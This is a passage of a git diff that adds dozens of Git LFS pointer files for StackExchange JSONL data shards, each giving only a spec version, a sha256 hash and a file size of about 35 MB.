0000000000000000000000000000000000000000..59886ebb15a3d449ff3bc5a7a34f59a6877508f1 --- /dev/null +++ b/data/stackexchange/1-1/1615_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba8564e82faef89d15d8f443ebc07d2a4003f49fdced5f58b649c99179b67137 +size 34554096 diff --git a/data/stackexchange/1-1/1616_2289.jsonl b/data/stackexchange/1-1/1616_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5914b02fb9cdcaa58b5c48b49781506c175e411 --- /dev/null +++ b/data/stackexchange/1-1/1616_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcfbbe5ad760fabc395c7412a79e4fe43f2ca23e001b6751055e145ffff39db0 +size 34574320 diff --git a/data/stackexchange/1-1/1617_2289.jsonl b/data/stackexchange/1-1/1617_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..86ba709fb4d2deab42a16d5075e874dee3385828 --- /dev/null +++ b/data/stackexchange/1-1/1617_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e18b1fe5cf90cb9254422f2ce62da89b535e2a3c235586ea18229811f35148aa +size 34901548 diff --git a/data/stackexchange/1-1/1618_2289.jsonl b/data/stackexchange/1-1/1618_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dc204bb7e3b1b5263debab5649c34f142c144d53 --- /dev/null +++ b/data/stackexchange/1-1/1618_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc82c17bd972b22bc271f3df49a207089dde57683eeb2c46bb9a2fa40290c5f0 +size 34454941 diff --git a/data/stackexchange/1-1/1619_2289.jsonl b/data/stackexchange/1-1/1619_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e62be593ca752058fd2a0514458d3be45efc5095 --- /dev/null +++ b/data/stackexchange/1-1/1619_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8bc2939b9b86f2609718493102b0d32eb4b65ae535788dfa9e5306ed92282d90 +size 34539077 diff --git a/data/stackexchange/1-1/161_2289.jsonl b/data/stackexchange/1-1/161_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ce319c5787af06950a9293c8f5d37e0a7ec5950 --- /dev/null +++ b/data/stackexchange/1-1/161_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5598ede65ca529c5f724b80041995ce87d6a47f9007b0e6726d90730a3c0be70 +size 34815589 diff --git a/data/stackexchange/1-1/1620_2289.jsonl b/data/stackexchange/1-1/1620_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f9b7de0405a58bf4c0b68b5f32395b99ce26aae --- /dev/null +++ b/data/stackexchange/1-1/1620_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb3bc99999a0b427dbc333f4f2bcadaa6b7ee21751e742d80014c3e2c0032fd6 +size 34628283 diff --git a/data/stackexchange/1-1/1621_2289.jsonl b/data/stackexchange/1-1/1621_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bef7600432703997d339120406307e3abfcab1ea --- /dev/null +++ b/data/stackexchange/1-1/1621_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f4d2eec0f32c109e83995f6ef422cb9bff6bde63d2b23a11fed45f328996c7a +size 34989209 diff --git a/data/stackexchange/1-1/1622_2289.jsonl b/data/stackexchange/1-1/1622_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b737dcdedc88a48655e95f2aab77d9f0b492c77 --- /dev/null +++ b/data/stackexchange/1-1/1622_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8808567354b6f3e6dcf56ff402ec041064c48a3fa562c3d38bf7fa7157c2d4fe +size 33901065 diff --git a/data/stackexchange/1-1/1623_2289.jsonl b/data/stackexchange/1-1/1623_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7fc90f1e87b92b4e67f44a32bc754f8530197b64 --- /dev/null +++ b/data/stackexchange/1-1/1623_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e57e5bd3af3b17bcbba3dc41d24039e44ae25707edf25ed718e27d8da58acb7a +size 35035414 diff --git a/data/stackexchange/1-1/1624_2289.jsonl b/data/stackexchange/1-1/1624_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..991d34c39efd5e667d9141fc1f431d56db45d762 --- /dev/null +++ b/data/stackexchange/1-1/1624_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2967d8b82a0acf5859fe9725ee906454fb8a0e3b5ff82bf8c53e83470b78012 +size 34355113 diff --git a/data/stackexchange/1-1/1625_2289.jsonl b/data/stackexchange/1-1/1625_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88060bc0dab1b23bd11439be00c135fac7532c0e --- /dev/null +++ b/data/stackexchange/1-1/1625_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af81dcea1c2bec5d2888a94d39c0709ec96a51ae310d3a03c0562c469629a9e2 +size 34264479 diff --git a/data/stackexchange/1-1/1626_2289.jsonl b/data/stackexchange/1-1/1626_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ec2ab017e1df3fc875f135d185895f860c179f0 --- /dev/null +++ b/data/stackexchange/1-1/1626_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:506cad88bc4712785a0b1c81d1273f2bc5527beaf2054f3840e7b57b950c33f5 +size 34442536 diff --git a/data/stackexchange/1-1/1627_2289.jsonl b/data/stackexchange/1-1/1627_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4804130da0836e0ffdf3b0f5f6b482494b42df81 --- /dev/null +++ b/data/stackexchange/1-1/1627_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4dd5dc4ede72fd3c6479f4b3c1d092fd556ac8d4425c7019bf3ec488b4d6b31 +size 34232724 diff --git a/data/stackexchange/1-1/1628_2289.jsonl b/data/stackexchange/1-1/1628_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f482501b25d0e3adc9f925f1a612e320ec8d992b --- /dev/null +++ b/data/stackexchange/1-1/1628_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:002f261ab1c2e94f119209962c0e7391d277f6c9871f8a71e87ae7eac4092d1f +size 34694661 diff --git a/data/stackexchange/1-1/1629_2289.jsonl b/data/stackexchange/1-1/1629_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d33a73aef8d75e7aa859da8338b2edfb278d4ba5 --- /dev/null +++ b/data/stackexchange/1-1/1629_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17a2b13fdd69e8a973f64d7b3370229bf119ca2c0b9d5d6b6fe20f7f530503b6 +size 34480225 diff --git a/data/stackexchange/1-1/162_2289.jsonl b/data/stackexchange/1-1/162_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ceab5b02981d963ee599a744a7f55265fa82fef3 --- /dev/null +++ b/data/stackexchange/1-1/162_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:830e17411b53c4f10c9e3971b136933febcd4cd68ceab9064d8bad8400e81d38 +size 34197512 diff --git a/data/stackexchange/1-1/1630_2289.jsonl b/data/stackexchange/1-1/1630_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c04341e400584e9d0326e66d67056d9de95688ec --- /dev/null +++ b/data/stackexchange/1-1/1630_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c4251c268b2c72ac17ee214fb351a3e344c86944c1411bf44d03b6a9ccbdcd7 +size 34880761 diff --git a/data/stackexchange/1-1/1631_2289.jsonl b/data/stackexchange/1-1/1631_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36c09c5eb76ea7d9162bf59d5218cdf2ffa29135 --- /dev/null +++ b/data/stackexchange/1-1/1631_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93267a64f183498c69ab6c2731cae41d9dedc9a5ba8a9cb6fd505f08791d9472 +size 34154941 diff --git a/data/stackexchange/1-1/1632_2289.jsonl b/data/stackexchange/1-1/1632_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ea8f0ae5389b61f519a50314b8f42d26944306c --- /dev/null +++ b/data/stackexchange/1-1/1632_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe9421b41c63482cd2ab10cc642cafc857fd54d397862654e6cc432e551b4915 +size 34640194 diff --git a/data/stackexchange/1-1/1633_2289.jsonl b/data/stackexchange/1-1/1633_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74845eef9157f86db4662858e6a1d98987c57ad3 --- /dev/null +++ b/data/stackexchange/1-1/1633_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59c0bd63020c8e3c371c2c25573c670a5579a45ea4ce7f936ecbb941aa079397 +size 34132664 diff --git a/data/stackexchange/1-1/1634_2289.jsonl b/data/stackexchange/1-1/1634_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4191db5af9274ac981834bc89b4d527b2641c6d8 --- /dev/null +++ b/data/stackexchange/1-1/1634_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad6a688bca6a2c5de094c9975ab10bba94aa5db866eea6953244d5c1cb10a06f +size 34478793 diff --git a/data/stackexchange/1-1/1635_2289.jsonl b/data/stackexchange/1-1/1635_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..297e6f575a411cd8ed8a49ae84772e84c44765c1 --- /dev/null +++ b/data/stackexchange/1-1/1635_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a1f45591d920a7e2e4e938ecb2fe3a1a05597ec089a5c7f81be6d113ec424b1 +size 35037631 diff --git a/data/stackexchange/1-1/1636_2289.jsonl b/data/stackexchange/1-1/1636_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..144c208a45994a902af54de14319948cf39fd125 --- /dev/null +++ b/data/stackexchange/1-1/1636_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d67fa603af060e0888e06fca3a863f3cba222e2e3adb2d674d45e367a9265757 +size 34962362 diff --git a/data/stackexchange/1-1/1637_2289.jsonl b/data/stackexchange/1-1/1637_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b53aeb580feb45c672895da4fa79326a388c3169 --- /dev/null +++ b/data/stackexchange/1-1/1637_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f216edb1b4dff97b2df28af0375cffe26f91c1a0b8432780955402c76d23a4e +size 34537379 diff --git a/data/stackexchange/1-1/1638_2289.jsonl b/data/stackexchange/1-1/1638_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3678d5cdcdf050e20334ec1d7ec8652026c93b27 --- /dev/null +++ b/data/stackexchange/1-1/1638_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a0596e9d8a4012c0f5bc4389262e260239e976c9792dc6e88e1c3c853711e61 +size 34169423 diff --git a/data/stackexchange/1-1/1639_2289.jsonl b/data/stackexchange/1-1/1639_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bf006c1194ae55822dd098a6ff247a85807bca7 --- /dev/null +++ b/data/stackexchange/1-1/1639_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a42a1f68c3e26764170ce23f3f9b7e76f907e30e68c419a64365ce31e9bcf57 +size 35448192 diff --git a/data/stackexchange/1-1/163_2289.jsonl b/data/stackexchange/1-1/163_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d977b701404c54220d01dd0a92fccec7c5239db9 --- /dev/null +++ b/data/stackexchange/1-1/163_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:790f4db56df7e006ff7f4105417fff4fa5cd97c7445d08d56b7a7333f8de9107 +size 35461840 diff --git a/data/stackexchange/1-1/1640_2289.jsonl b/data/stackexchange/1-1/1640_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..27f624ac24accbc01eda524829a98c09a32e6e3e --- /dev/null +++ b/data/stackexchange/1-1/1640_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9008bb383b2b71da8932d322713fb65804d38c947afbc92997261b56906287ff +size 35143787 diff --git a/data/stackexchange/1-1/1641_2289.jsonl b/data/stackexchange/1-1/1641_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..672996fe5bc89e88d58ee9bf8d62d5f28c70617e --- /dev/null +++ b/data/stackexchange/1-1/1641_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9bd11a0b20d3c6b1c5b7125c903f2bdf7435867a25288387c64320e65bdc7d3b +size 35236588 diff --git a/data/stackexchange/1-1/1642_2289.jsonl b/data/stackexchange/1-1/1642_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f81ba4353f2a58503aa46a3262533e270b3838d --- /dev/null +++ b/data/stackexchange/1-1/1642_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3280ac878e179d11f536157d8efb00463e58cf562053857e5f6f7df417dc28e2 +size 35386827 diff --git a/data/stackexchange/1-1/1643_2289.jsonl b/data/stackexchange/1-1/1643_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34ac45074f7354ffb40b5e674cbdbae3025fe6d9 --- /dev/null +++ b/data/stackexchange/1-1/1643_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8cec7d49799e0cbce564cdacee949597bb6a5117e2910483613eafea5f3bfa6 +size 35733606 diff --git a/data/stackexchange/1-1/1644_2289.jsonl b/data/stackexchange/1-1/1644_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e85f1017fa36a61a37918a36ff04e7cabaa7b63 --- /dev/null +++ b/data/stackexchange/1-1/1644_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a464aaa36e95a1462a3019e3677119cfaea3c96d3a3359290c56b778cd55c81 +size 35222773 diff --git a/data/stackexchange/1-1/1645_2289.jsonl b/data/stackexchange/1-1/1645_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b8f39753e71abf7dc167e36982e0fb321dc2198 --- /dev/null +++ b/data/stackexchange/1-1/1645_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:373bf6418eba6f267eb98743392aef30eba19b97e11395043c2cb3f6f87d40c4 +size 35349385 diff --git a/data/stackexchange/1-1/1646_2289.jsonl b/data/stackexchange/1-1/1646_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b48cd778a391bf94069772d17780837834f4a4c7 --- /dev/null +++ b/data/stackexchange/1-1/1646_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2d231088f85d57732a6282297f618f7814310db3e796ae189dcfd04b7632b47 +size 34980316 diff --git a/data/stackexchange/1-1/1647_2289.jsonl b/data/stackexchange/1-1/1647_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e65a93a0579b22f2aaaef82c0ffcaa7e61f01e08 --- /dev/null +++ b/data/stackexchange/1-1/1647_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ccd7b0a2c4ed5470cfbc9e541a9025f203245a81dc786de1d9c5dfc66dbc679 +size 35728161 diff --git a/data/stackexchange/1-1/1648_2289.jsonl b/data/stackexchange/1-1/1648_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d59687e5899758576474b5fa64e5166850fe072 --- /dev/null +++ b/data/stackexchange/1-1/1648_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a169689a82b068a00e829bb8dbaca014aca88fcb0417809713732f516f05489d +size 35249508 diff --git a/data/stackexchange/1-1/1649_2289.jsonl b/data/stackexchange/1-1/1649_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..facb6b3044cf01af08da14414a8948398a1de457 --- /dev/null +++ b/data/stackexchange/1-1/1649_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6edd9eaca0b1dbb4c46a687fff4d4e9417584780cdadc01507932b3245f9532 +size 35892690 diff --git a/data/stackexchange/1-1/164_2289.jsonl b/data/stackexchange/1-1/164_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..862f8d331bea0c2b1f5aef86da60bee197c43f91 --- /dev/null +++ b/data/stackexchange/1-1/164_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8e4e87ac96fc083c7cd529916ff0c5b4531a5ed1a1131bde8329202782e332d +size 35149294 diff --git a/data/stackexchange/1-1/1650_2289.jsonl b/data/stackexchange/1-1/1650_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18854521566f2be65ca388b42745cd1521f87712 --- /dev/null +++ b/data/stackexchange/1-1/1650_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f124c9ffe789ce3e4586fe5d1a1dfe7a40ea29f43938228da388c8d7c8f6fb02 +size 35092454 diff --git a/data/stackexchange/1-1/1651_2289.jsonl b/data/stackexchange/1-1/1651_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..619fdf5d10f1c3a7f28a0a2d00203fc5380c224d --- /dev/null +++ b/data/stackexchange/1-1/1651_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14bb7b4f44b0c962eef3daea3e2cb47d06e29fc5bbef364aed4ac7b7a3aea736 +size 35465507 diff --git a/data/stackexchange/1-1/1652_2289.jsonl b/data/stackexchange/1-1/1652_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f1085060bf0f648485bc333118225800239a4b9 --- /dev/null +++ b/data/stackexchange/1-1/1652_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80513841f181d331b37564fb5601667d3778fc986b3f2cd315a525c353ec5ee9 +size 34947902 diff --git a/data/stackexchange/1-1/1653_2289.jsonl b/data/stackexchange/1-1/1653_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a22299808c39dd9e783aa14f2573ac28c48415c9 --- /dev/null +++ b/data/stackexchange/1-1/1653_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b5277fa55efbec1593681a2b1b6e0bc24ad52e541e88bb44c5dc8beb7bbeb26 +size 35384156 diff --git a/data/stackexchange/1-1/1654_2289.jsonl b/data/stackexchange/1-1/1654_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cae39c9259dc4ed2db7e06a6727b73f989f610af --- /dev/null +++ b/data/stackexchange/1-1/1654_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6cabf9b00d6f696c3c1b39d05dfe1d10c11acfddddaf51e942e2144e0d92db9 +size 35402589 diff --git a/data/stackexchange/1-1/1655_2289.jsonl b/data/stackexchange/1-1/1655_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ac112f6ceec92c10f2acd2617565780dd253c70a --- /dev/null +++ b/data/stackexchange/1-1/1655_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e4a81026540c857c3df805703d557fa5e3e3f3761959bc5620c361d578aeabd +size 34957320 diff --git a/data/stackexchange/1-1/1656_2289.jsonl b/data/stackexchange/1-1/1656_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7ab504c2b1490e1681d61fb6253cd9e587bc5c4 --- /dev/null +++ b/data/stackexchange/1-1/1656_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad31313fdaa8b1e58758bdd54941516c0ad54bed7ba4338f4000fcce440b4c63 +size 35168900 diff --git a/data/stackexchange/1-1/1657_2289.jsonl b/data/stackexchange/1-1/1657_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..901a54200c7b55537241706c0d07cef251342914 --- /dev/null +++ b/data/stackexchange/1-1/1657_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69edf5e7185c04d14a00ceca3ba40a25fe109f5e4bfd1c14f3d0ddf058a39c31 +size 35728263 diff --git a/data/stackexchange/1-1/1658_2289.jsonl b/data/stackexchange/1-1/1658_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd9bb5bb7269f714e6adaa2bfebb27236d56e4f1 --- /dev/null +++ b/data/stackexchange/1-1/1658_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c67615724b1412522c3f359f852696d877a3505fcf7ea552729c232a66c61ef +size 35538388 diff --git a/data/stackexchange/1-1/1659_2289.jsonl b/data/stackexchange/1-1/1659_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad2a98c99e3938347e9abe9b1c419f443f769086 --- /dev/null +++ b/data/stackexchange/1-1/1659_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cef67ec19d06b3c8b725cb0657032eb8004c5fef8d627b9c8ab8674bb24b8284 +size 35624105 diff --git a/data/stackexchange/1-1/165_2289.jsonl b/data/stackexchange/1-1/165_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b55d04eb4e9f9f09294127837933741b473b9bc0 --- /dev/null +++ b/data/stackexchange/1-1/165_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6685d42f21911872960525aa7b69e37a1bf1165c161579c2bff59b013a87b190 +size 34792606 diff --git a/data/stackexchange/1-1/1660_2289.jsonl b/data/stackexchange/1-1/1660_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21b9d97d8623299e50ee9c8cb29a8dbfdebe4e4c --- /dev/null +++ b/data/stackexchange/1-1/1660_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79ce66ddb63708e72ab0e3724cb00c6e974feaf75195ee72b8251a81c6a2af8d +size 35179707 diff --git a/data/stackexchange/1-1/1661_2289.jsonl b/data/stackexchange/1-1/1661_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b1450a459df9d62e220ddcb9c7f83ffa091fa83 --- /dev/null +++ b/data/stackexchange/1-1/1661_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57f5e7cfdfe09a970200146ddcc8048f611e2137ccbf6ceda54f54ec613b8920 +size 35442654 diff --git a/data/stackexchange/1-1/1662_2289.jsonl b/data/stackexchange/1-1/1662_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30e68b39e090b1d7cd8f460d0fa869de2e81dce8 --- /dev/null +++ b/data/stackexchange/1-1/1662_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38a64596673692b2719813544aa4fbb8f374be9b5ce6ca631faf1f5d46764840 +size 35552048 diff --git a/data/stackexchange/1-1/1663_2289.jsonl b/data/stackexchange/1-1/1663_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..062a7dfe6316e42b30a9de92f97aead18a20de90 --- /dev/null +++ b/data/stackexchange/1-1/1663_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a381694894580e8db780962899bf18e1eb58dcaa8878880ba4a214ddcd0823c +size 34898462 diff --git a/data/stackexchange/1-1/1664_2289.jsonl b/data/stackexchange/1-1/1664_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..24515c222915a1a47122266381bbbf5735f12c30 --- /dev/null +++ b/data/stackexchange/1-1/1664_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:826d3258aa3523b4caf8c9ee10cedd6b9afdd59ff445774e884b42d0191ba7c6 +size 36229054 diff --git a/data/stackexchange/1-1/1665_2289.jsonl b/data/stackexchange/1-1/1665_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4db25d6663fca3fdd319521ebc34eeb03df2478b --- /dev/null +++ b/data/stackexchange/1-1/1665_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a3d68a5ed16a5f3489ba4bf4e550daeb097343bbe2a5d53240d38f30d708623 +size 35639893 diff --git a/data/stackexchange/1-1/1666_2289.jsonl b/data/stackexchange/1-1/1666_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0c27440a2c4780256d18df315e8d272ab11978c --- /dev/null +++ b/data/stackexchange/1-1/1666_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3bc91daf8d841cca7f4e84f699f93836529e48b4e05270c1fa77593327229fc +size 35318376 diff --git a/data/stackexchange/1-1/1667_2289.jsonl b/data/stackexchange/1-1/1667_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c99491be0646cbb8f2b74ffbe8fbbd0af7c8f85a --- /dev/null +++ b/data/stackexchange/1-1/1667_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f9b7f9be669ec57711c5de6756a326be8544c1c5d5ae4475e4e903f2c35ba84 +size 35436074 diff --git a/data/stackexchange/1-1/1668_2289.jsonl b/data/stackexchange/1-1/1668_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0225f324ea62b22cdb6504e3e7022bcd49094d85 --- /dev/null +++ b/data/stackexchange/1-1/1668_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf126b4088f79e6859e43ff8a33f31b691f8bd97fee109b70873b355910b282c +size 35255253 diff --git a/data/stackexchange/1-1/1669_2289.jsonl b/data/stackexchange/1-1/1669_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ae5151d4c0f37103142fee1ad13649e1635e4a6 --- /dev/null +++ b/data/stackexchange/1-1/1669_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15bd016b2df3fd2088bb28e53e4f65e29bb3a7a3bd4f7da99ca62ca9131ee1b6 +size 35392124 diff --git a/data/stackexchange/1-1/166_2289.jsonl b/data/stackexchange/1-1/166_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..526bc3c6e62d9cfd164b86c2a275d1002a60fc0d --- /dev/null +++ b/data/stackexchange/1-1/166_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8585857e52f9eb4aa886735105f57d2459c240e98b1dac972995ad5a2cc8afd +size 34622656 diff --git a/data/stackexchange/1-1/1670_2289.jsonl b/data/stackexchange/1-1/1670_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2ad0a363435c35bc553ed67fd5bd951f021480f --- /dev/null +++ b/data/stackexchange/1-1/1670_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41bfc7ecf2caf38e62d434eeb65d388115f917e8b56b2191aa6e7dfc2fec9a1d +size 34997918 diff --git a/data/stackexchange/1-1/1671_2289.jsonl b/data/stackexchange/1-1/1671_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef81ed23fa7c99fb9b56b9f37f16d5abb18c7df --- /dev/null +++ b/data/stackexchange/1-1/1671_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f2d849717f3212ae299aec458768ecf3ed7826630dd63deff2169c15d58fe3a +size 35499158 diff --git a/data/stackexchange/1-1/1672_2289.jsonl b/data/stackexchange/1-1/1672_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8471f6a799a5f8e83643c04d1400896a5e27da6 --- /dev/null +++ b/data/stackexchange/1-1/1672_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:24d807aabe45dee81f7579041cf2c4a1941779b09080a88e7e3e32ea1750c1f7 +size 35489118 diff --git a/data/stackexchange/1-1/1673_2289.jsonl b/data/stackexchange/1-1/1673_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84669fcecfaf4f504db1a28e4e0c1621f949ff49 --- /dev/null +++ b/data/stackexchange/1-1/1673_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcbe2835239813484cd1bb4f31541f92857732decedf9634f779f2972404d538 +size 35429419 diff --git a/data/stackexchange/1-1/1674_2289.jsonl b/data/stackexchange/1-1/1674_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..059c05daa65eb1632045fc91038204f9f450c7d3 